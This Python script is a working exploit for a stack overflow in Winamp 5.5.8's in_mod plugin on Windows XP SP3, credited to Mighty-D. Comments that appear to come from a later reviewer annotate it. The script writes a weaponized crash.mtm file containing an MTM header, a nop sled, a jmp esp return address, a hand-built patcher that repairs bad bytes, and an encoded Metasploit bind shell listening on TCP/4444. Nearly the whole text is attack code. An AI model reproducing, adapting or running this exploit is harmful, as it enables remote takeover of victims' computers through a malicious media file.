#!/usr/bin/python
# Pwn And Beans by Mighty-D presents:
# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow
# WINDOWS XP SP3 FULLY PATCHED - NO ASLR OR DEP BYPASS... yet
# Bug found by http://www.exploit-db.com/exploits/15248/
# POC by fdisk
# Exploit by Mighty-D
# Special thanks to:
#   fdisk: who wrote the skeleton of what you are looking at
#   Ryujin: for pointing out the bug
#   Muts: for bringing the pain and the omelet ideas that weren't used
#   dijital1 and all the EDB-Team
#   The guys from UdeA, Ryepes, HerreraDavid, GomezRam7
# Just one comment: Stupid badchars!!!!!!!
# 66-byte MTM file header, shipped exactly as the PoC had it.  The first
# 24 bytes decode as the ASCII magic "MTM", a version byte 0x10 and the
# 20-byte song name "SpaceTrack(kosmosis)".  NOTE(review): the remaining
# fields are not decoded here; presumably \x20\xFF is the little-endian
# comment length (0xFF20) that drives the oversized copy in in_mod, and
# the 16 x "\x04\x0C" tail is the per-track pan table -- confirm against
# the MTM layout / the plugin before touching any of it.
_mtm_magic_and_name = "\x4D\x54\x4D\x10\x53\x70\x61\x63\x65\x54\x72\x61\x63\x6B\x28\x6B\x6F\x73\x6D\x6F\x73\x69\x73\x29"
_mtm_counts = "\xE0\x00\x29\x39\x20\xFF\x1F\x00\x40\x0E"
_mtm_pan_table = "\x04\x0C" * 16
header = "".join([_mtm_magic_and_name, _mtm_counts, _mtm_pan_table])
# Filler in front of the overwritten return address: 58207 x 0x90 (nop).
# NOTE(review): this count is what places `eip` over the saved return
# address of the vulnerable in_mod routine; change it only together with a
# re-measured offset.
NOP = "\x90"
nopsled = NOP * 58207

# Value written over the saved return address: 0x7C951EED, little-endian.
# Per the original author's note it is a `jmp esp` in a Spanish Windows
# XP SP3 build (presumably a system DLL).  The address is build-specific --
# re-locate it with a debugger for any other target.  After the `ret`
# esp points at the bytes that follow in the payload, so the jump lands in
# patch_shellcode.
eip = "\xED\x1E\x95\x7C"
# Runtime patcher that runs before the bind-shell decoder in `shellcode`.
# Some bytes of the final shellcode cannot be shipped in the file (every
# "should be NN" placeholder below is the real value + 0x20, i.e. bytes
# below 0x20 are bad, and a few bytes were "Ripped" entirely), so this
# stub repairs them in memory: it points ebx at the copied shellcode and
# walks forward with `inc ebx` (43), fixing each byte with
# `sub byte [ebx], imm8` (80 2B xx).  The arithmetic shows what the loader
# leaves in memory at the ripped positions: 0x0D-0x42=0xCB, 0x0A-0x78=0x92,
# 0x0A-0x49=0xC1, etc., and the 0x90 pads marked "CrLf" recur every 40 file
# bytes (40, 80, ... 840).  NOTE(review): presumably in_mod re-flows the
# comment as 40-byte lines terminated by CR/LF and inserts an LF after
# every CR (each single "Ripped" byte in `shellcode` follows a literal
# 0x0D); that mechanism is inferred from the numbers, not shown here --
# confirm in the plugin before re-targeting.  0x0D decodes as
# `or eax, imm32` and swallows the following 4 bytes, which is why each
# pad is at least four nops.  Do not move or resize any entry: every inc
# count after it would be off.
patch_shellcode = "\x90"* 16  # landing pad after jmp esp
patch_shellcode +="\x90\x33\xDB"  # nop; xor ebx, ebx
patch_shellcode +="\x54\x5B"  # push esp; pop ebx -> ebx = our own stack address (position independent)
patch_shellcode +="\x81\xEB\x95\xFC\xFF\xFF"  # sub ebx, 0xFFFFFC95 (== add ebx, 0x36B): ebx now sits just before the copied shellcode
patch_shellcode +="\x43"*13  # inc ebx x13: walk up towards the first bad byte
patch_shellcode +="\x90"*4  # pad: the loader's CR/LF lands here (40 file bytes in)
patch_shellcode +="\x43"*1  # inc ebx -> first bad byte
patch_shellcode +="\x80\x2B\x20"  # sub [ebx], 0x20 -> 0x13 (author-verified)
patch_shellcode +="\x43"*3  # inc ebx x3 -> next bad byte
patch_shellcode +="\x80\x2B\x20"  # sub [ebx], 0x20 -> 0x05
patch_shellcode +="\x43"*16  # inc ebx x16 -> next bad byte
patch_shellcode +="\x80\x2B\xEC"  # sub [ebx], 0xEC -> 0x21 (from 0x0D)
patch_shellcode +="\x43"*1  # inc ebx -> next bad byte
patch_shellcode +="\x80\x2B\x7C"  # sub [ebx], 0x7C -> 0x8E (from 0x0A)
patch_shellcode +="\x90"*8  # pad for the loader's CR/LF (80 file bytes in)
patch_shellcode +="\x43"*30  # inc ebx x30 -> next bad byte
patch_shellcode +="\x80\x2B\x20"  # sub [ebx], 0x20 -> 0x05
patch_shellcode +="\x90"*8  # pad for the loader's CR/LF (120 file bytes in)
patch_shellcode +="\x43"*11  # inc ebx x11 -> next bad byte
patch_shellcode +="\x80\x2B\x42"  # sub [ebx], 0x42 -> 0xCB (from 0x0D)
patch_shellcode +="\x43"*1  # inc ebx -> next bad byte
patch_shellcode +="\x80\x2B\x78"  # sub [ebx], 0x78 -> 0x92 (from 0x0A)
patch_shellcode +="\x90"*26  # pad for the loader's CR/LF (160 file bytes in)
patch_shellcode +="\x43"*18  # inc ebx x18 -> next bad byte
patch_shellcode +="\x80\x2B\x20"  # sub [ebx], 0x20 -> 0x04
patch_shellcode +="\x90"*16  # pad for the loader's CR/LF (200 file bytes in)
patch_shellcode +="\x43"*15  # inc ebx x15 -> next bad byte
patch_shellcode +="\x80\x2B\x20"  # sub [ebx], 0x20 -> 0x02
patch_shellcode +="\x43"*8  # inc ebx x8 -> next bad byte
patch_shellcode +="\x80\x2B\x21"  # sub [ebx], 0x21 -> 0xEC (from 0x0D)
patch_shellcode +="\x43"*1  # inc ebx -> next bad byte
patch_shellcode +="\x80\x2B\x7C"  # sub [ebx], 0x7C -> 0x8E (from 0x0A)
patch_shellcode +="\x90"*14  # pad for the loader's CR/LF (240 file bytes in)
patch_shellcode +="\x43"*18  # inc ebx x18 -> next bad byte
patch_shellcode +="\x80\x2B\x49"  # sub [ebx], 0x49 -> 0xC1 (from 0x0A)
patch_shellcode +="\x90"*13  # pad for the loader's CR/LF (280 file bytes in)
patch_shellcode +="\x43"*4  # inc ebx x4 -> next bad byte
patch_shellcode +="\x80\x2B\x20"  # sub [ebx], 0x20 -> 0xEA; one more step needed because 0xF6 + 0x0A... is not reachable in one imm8 without a bad char (author's note)
patch_shellcode +="\x80\x2B\xF4"  # sub [ebx], 0xF4 -> 0xF6
patch_shellcode +="\x43"*9  # inc ebx x9 -> next bad byte
patch_shellcode +="\x80\x2B\x20"  # sub [ebx], 0x20 -> 0x11
patch_shellcode +="\x43"*10  # inc ebx x10 -> next bad byte
patch_shellcode +="\x90"*3  # pad for the loader's CR/LF (320 file bytes in)
patch_shellcode +="\x80\x2B\xCD"  # sub [ebx], 0xCD -> 0x3D (from 0x0A)
patch_shellcode +="\x43"*3  # inc ebx x3 -> next bad byte
patch_shellcode +="\x80\x2B\x20"  # sub [ebx], 0x20 -> 0x07
patch_shellcode +="\x43"*11  # inc ebx x11 -> next bad byte
patch_shellcode +="\x80\x2B\x20"  # sub [ebx], 0x20 -> 0x12
patch_shellcode +="\x43"*4  # inc ebx x4 -> next bad byte
patch_shellcode +="\x80\x2B\x20"  # sub [ebx], 0x20 -> 0x12
patch_shellcode +="\x90"*13  # pad for the loader's CR/LF (360 file bytes in)
patch_shellcode +="\x43"*4  # inc ebx x4 -> next bad byte
patch_shellcode +="\x80\x2B\x20"  # sub [ebx], 0x20 -> 0x12
patch_shellcode +="\x43"*8  # inc ebx x8 -> next bad byte
patch_shellcode +="\x80\x2B\x20"  # sub [ebx], 0x20 -> 0x12
patch_shellcode +="\x90"*19  # pad for the loader's CR/LF (400 file bytes in)
patch_shellcode +="\x43"*11  # inc ebx x11 -> next bad byte
patch_shellcode +="\x80\x2B\x8E"  # sub [ebx], 0x8E -> 0x7F (from 0x0D)
patch_shellcode +="\x43"*1  # inc ebx -> next bad byte
patch_shellcode +="\x80\x2B\xDF"  # sub [ebx], 0xDF -> 0x2B (from 0x0A)
patch_shellcode +="\x43"*8  # inc ebx x8 -> next bad byte
patch_shellcode +="\x80\x2B\x1E"  # sub [ebx], 0x1E -> 0xEC (from 0x0A)
patch_shellcode +="\x90"*11  # pad for the loader's CR/LF (440 file bytes in)
patch_shellcode +="\x43"*12  # inc ebx x12 -> next bad byte
patch_shellcode +="\x80\x2B\x20"  # sub [ebx], 0x20 -> 0x08
patch_shellcode +="\x90"*28  # pad for the loader's CR/LF (480 file bytes in)
patch_shellcode +="\x43"*29  # inc ebx x29 -> next bad byte
patch_shellcode +="\x80\x2B\xa7"  # sub [ebx], 0xA7 -> 0x66 (from 0x0D)
patch_shellcode +="\x43"*1  # inc ebx -> next bad byte
patch_shellcode +="\x90"*4  # pad for the loader's CR/LF (520 file bytes in)
patch_shellcode +="\x80\x2B\xb8"  # sub [ebx], 0xB8 -> 0x52 (from 0x0A)
patch_shellcode +="\x90"*9  # extra pad (author placed it empirically)
patch_shellcode +="\x43"*17  # inc ebx x17 -> next bad byte
patch_shellcode +="\x80\x2B\x20"  # sub [ebx], 0x20 -> 0x03
patch_shellcode +="\x90"*9  # pad for the loader's CR/LF (560 file bytes in)
patch_shellcode +="\x43"*3  # inc ebx x3 -> next bad byte
patch_shellcode +="\x80\x2B\x20"  # sub [ebx], 0x20 -> 0x12
patch_shellcode +="\x90"*12  # pad for the loader's CR/LF
patch_shellcode +="\x43"*2  # inc ebx x2 -> next bad byte
patch_shellcode +="\x80\x2B\x20"  # sub [ebx], 0x20 -> 0x03
patch_shellcode +="\x43"*7  # inc ebx x7 -> next bad byte
patch_shellcode +="\x80\x2B\x20"  # sub [ebx], 0x20 -> 0x02
patch_shellcode +="\x90"*10  # pad for the loader's CR/LF (600 file bytes in)
patch_shellcode +="\x43"*6  # inc ebx x6 -> next bad byte
patch_shellcode +="\x80\x2B\x20"  # sub [ebx], 0x20 -> 0x13
patch_shellcode +="\x43"*3  # inc ebx x3 -> next bad byte
patch_shellcode +="\x80\x2B\x20"  # sub [ebx], 0x20 -> 0x05
patch_shellcode +="\x43"*3  # inc ebx x3 -> next bad byte
patch_shellcode +="\x80\x2B\x1B"  # sub [ebx], 0x1B -> 0xF2 (from 0x0D)
patch_shellcode +="\x43"*1  # inc ebx -> next bad byte
patch_shellcode +="\x80\x2B\xF4"  # sub [ebx], 0xF4 -> 0x16 (from 0x0A)
patch_shellcode +="\x90"*19  # pad for the loader's CR/LF (640 file bytes in)
patch_shellcode +="\x43"*4  # inc ebx x4 -> next bad byte
patch_shellcode +="\x80\x2B\x20"  # sub [ebx], 0x20 -> 0x10
patch_shellcode +="\x43"*4  # inc ebx x4 -> next bad byte
patch_shellcode +="\x80\x2B\x20"  # sub [ebx], 0x20 -> 0x10
patch_shellcode +="\x90"*20  # pad for the loader's CR/LF (680 file bytes in)
patch_shellcode +="\x43"*17  # inc ebx x17 -> next bad byte
patch_shellcode +="\x90"*28  # pad for the loader's CR/LF (720 file bytes in); sized generously
patch_shellcode +="\x43"*16  # inc ebx x16 -> next bad byte
patch_shellcode +="\x80\x2B\x26"  # sub [ebx], 0x26 -> 0xE7 (from 0x0D)
patch_shellcode +="\x90"*18  # pad for the loader's CR/LF (760 file bytes in)
patch_shellcode +="\x43"*1  # inc ebx -> next bad byte
patch_shellcode +="\x80\x2B\xBE"  # sub [ebx], 0xBE -> 0x4C (from 0x0A)
patch_shellcode +="\x43"*7  # inc ebx x7 -> last bad byte
patch_shellcode +="\x80\x2B\x20"  # sub [ebx], 0x20 -> 0x05
patch_shellcode +="\x90"*(66)  # trailing pad (covers the CR/LF at 800 and 840); the decoder starts right after.  Original generator note for what follows: win32_bind -EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub
# Encoded bind shell, shipped with its bad bytes swapped out.  Per the
# generator note in the original (win32_bind -EXITFUNC=process LPORT=4444
# Size=344 Encoder=PexFnstenvSub, i.e. Metasploit) it listens for a shell
# on TCP/4444 on the victim once it runs.  Security note: the generated
# .mtm is a weaponized file -- produce and open it only in an isolated lab.
# The first 24 bytes decode as the PexFnstenvSub stub: sub ecx,ecx;
# sub ecx,-0x50; fldz; fnstenv [esp-0xc]; pop ebx; xor dword [ebx+0x13],KEY;
# sub ebx,-4; loop -- so in memory it expects 0x50 dwords (320 bytes) of
# encoded data right after the stub, 344 in total as the note says.
# Every "should be NN" byte is a placeholder (real value + 0x20) that
# patch_shellcode rewrites in memory before the decoder runs; "Ripped"
# marks bytes removed from the file because the loader presumably puts
# 0x0D/0x0A there (each single rip follows a literal 0x0D), which the
# patcher then turns back into the listed values.  Keep every byte and
# line in place: the patcher's inc counts depend on this exact layout.
shellcode= "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"  # decoder stub up to the xor opcode/modrm
shellcode +="\x33"  # disp8 of the xor: should be 0x13 (patched at runtime)
shellcode +="\xa9\x41"  # XOR key, low bytes
shellcode +="\x25"  # XOR key byte: should be 0x05 (patched at runtime)
shellcode +="\x3f\x83\xeb\xfc\xe2\xf4\x55\x2b\xee\x72\x41\xb8\xfa\xc0"  # last key byte; sub ebx,-4; loop; then the encoded body begins
shellcode +="\x56"  # Ripped after this byte: 0x21 0x8E
shellcode +="\x53\x8d\x65\x8e\x7a\x95\xca\x79\x3a\xd1\x40\xea\xb4"
shellcode +="\xe6\x59\x8e\x60\x89\x40\xee\x76\x22\x75\x8e\x3e\x47\x70\xc5\xa6"
shellcode +="\x25"  # should be 0x05
shellcode +="\xc5\xc5\x4b\xae\x80\xcf\x32\xa8\x83\xee"  # Ripped after this: 0xCB 0x92
shellcode +="\x15\x21\x17"
shellcode +="\xdc\xa4\x8e\x60\x8d\x40\xee\x59\x22\x4d\x4e\xb4\xf6\x5d"
shellcode +="\x24"  # should be 0x04
shellcode +="\xd4\xaa\x6d\x8e\xb6\xc5\x65\x19\x5e\x6a\x70\xde\x5b\x22"
shellcode +="\x22"  # should be 0x02
shellcode +="\x35\xb4\xe9\x4d\x8e\x4f\xb5"  # Ripped after this: 0xEC 0x8E
shellcode +="\x7f\xa1\x1f\x6d\xb1\xe7\x4f\xe9\x6f"
shellcode +="\x56\x97\x63\x6c\xcf\x29\x36\x0d"  # Ripped after the 0x0D: 0xC1
shellcode +="\x36\x76\x0d"  # Ripped after the 0x0D: 0xF6
shellcode +="\x15\xfa\xef"
shellcode +="\xc1\x8a\xe8\xc3\x92"
shellcode +="\x31"  # should be 0x11
shellcode +="\xfa\xe9\xf6\xc8\xe0\x59\x28\xac\x0d"  # Ripped after the 0x0D: 0x3D
shellcode +="\xfc\x2b"
shellcode +="\x27"  # should be 0x07
shellcode +="\xc0\x79\x29\xdc\x36\x5c\xec\x52\xc0\x7f"
shellcode +="\x32"  # should be 0x12
shellcode +="\x56\x6c\xfa"
shellcode +="\x32"  # should be 0x12
shellcode +="\x46\x6c\xea"
shellcode +="\x32"  # should be 0x12
shellcode +="\xfa\xef\xcf\x29\x14\x63\xcf"
shellcode +="\x32"  # should be 0x12
shellcode +="\x8c\xde"
shellcode +="\x3c\x29\xa1\x25\xd9\x86\x52\xC0"  # Ripped after this: 0x7F 0x2B
shellcode +="\x15\x6e\xfc\xbe\xd5\x57"
shellcode +="\x0d"  # Ripped after the 0x0D: 0xEC
shellcode +="\x2b\xd6\xfe\xbe\xd3\x6c\xfc\xbe\xd5\x57\x4c"
shellcode +="\x28"  # should be 0x08
shellcode +="\x83\x76"
shellcode +="\xfe\xbe\xd3\x6f\xfd\x15\x50\xc0\x79\xd2\x6d\xd8\xd0\x87\x7c\x68"
shellcode +="\x56\x97\x50\xc0\x79\x27\x6f\x5b\xcf\x29"  # Ripped after this: 0x66 0x52
shellcode +="\x20\xa4\x6f\x6f"
shellcode +="\xf0\x68\xc9\xb6\x4e\x2b\x41\xb6\x4b\x70\xc5\xcc"
shellcode +="\x23"  # should be 0x03
shellcode +="\xbf\x47"
shellcode +="\x32"  # should be 0x12
shellcode +="\x57"
shellcode +="\x23"  # should be 0x03
shellcode +="\x29\xac\x24\x3b\x3d\x94"
shellcode +="\x22"  # should be 0x02
shellcode +="\xea\x6d\x4d\x57\xf2"
shellcode +="\x33"  # should be 0x13
shellcode +="\xc0\xdc"
shellcode +="\x25"  # should be 0x05
shellcode +="\xfa\xe9"  # Ripped after this: 0xF2 0x16
shellcode +="\x57\x6e\xf8"
shellcode +="\x30"  # should be 0x10
shellcode +="\x6f\x3e\xf8"
shellcode +="\x30"  # should be 0x10
shellcode +="\x50\x6e"
shellcode +="\x56\x91\x6d\x92\x70\x44\xcb\x6c\x56\x97\x6f\xc0\x56\x76\xfa\xef"
shellcode +="\x22\x16\xf9\xbc\x6d\x25\xfa\xe9\xfb\xbe\xd5"
shellcode +="\x57\xd7\x99"  # Ripped after this: 0xE7 0x4C
shellcode +="\xfa\xbe\xd3\xc0\x79\x41"
shellcode +="\x25"  # should be 0x05
shellcode +="\x3f"
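# Assemble the file image: 66-byte MTM header, then the oversized comment
# body -- nop sled, the value that overwrites the saved return address,
# the runtime patcher and the encoded bind shell.
payload = header + nopsled + eip + patch_shellcode + shellcode

# The payload is raw bytes, not text, so it must be written in binary mode:
# the original "w" mode newline-translates on Windows and, under Python 3,
# UTF-8-encodes every char >= 0x80 into two bytes, silently corrupting the
# sled, the return address and the patcher's offsets.  Under Python 3 the
# literals above are str; latin-1 maps code points 0x00-0xFF 1:1 onto
# bytes, so the on-disk image is identical on both interpreters.
payload_bytes = payload if isinstance(payload, bytes) else payload.encode("latin-1")

# Security note: crash.mtm is a weaponized file (per the generator comment
# the embedded shellcode opens a bind shell on TCP/4444 in the target).
# Generate and open it only inside an isolated lab VM.
try:
    # `with` closes the handle even if write() raises; the original leaked
    # it, and its bare `except:` also hid NameError and KeyboardInterrupt.
    with open("crash.mtm", "wb") as out:
        out.write(payload_bytes)
except (IOError, OSError) as err:
    print("Cannot create file: %s" % err)
else:
    print("MTM file generated successfuly")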